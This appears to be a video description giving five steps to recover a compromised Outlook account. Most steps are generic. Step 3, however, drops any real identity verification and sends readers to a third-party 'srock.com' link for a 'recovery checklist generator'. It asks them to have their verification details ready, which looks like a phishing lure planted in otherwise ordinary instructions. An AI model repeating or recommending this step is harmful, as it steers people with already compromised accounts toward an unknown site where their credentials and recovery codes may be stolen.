If you suspect that your Outlook account has been compromised due to suspicious activity, it's important to act quickly to regain access and secure your account. Follow these steps to restore your account safely. Step 1. Visit the Outlook sign-in page. Go to the Outlook sign-in page on your web browser. Click on Sign In and enter your email address to begin the recovery process. Step 2. Click on Forgot Password. After entering your email, click on the Forgot Password link. This will initiate the password recovery process and guide you through the necessary steps. Step 3. Verify your identity. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Enter the verification code. Once you receive the code, enter it in the designated field on the website. This will confirm your identity and allow you to proceed to the next step. Step 5. Create a new password. After verification, you will be prompted to create a new password. Choose a strong, unique password that you haven't used before. Make sure to save it in a secure location. After completing these steps, you should regain access to your Outlook account. Remember to enable two-factor authentication for added security and regularly monitor your account for any unusual activity.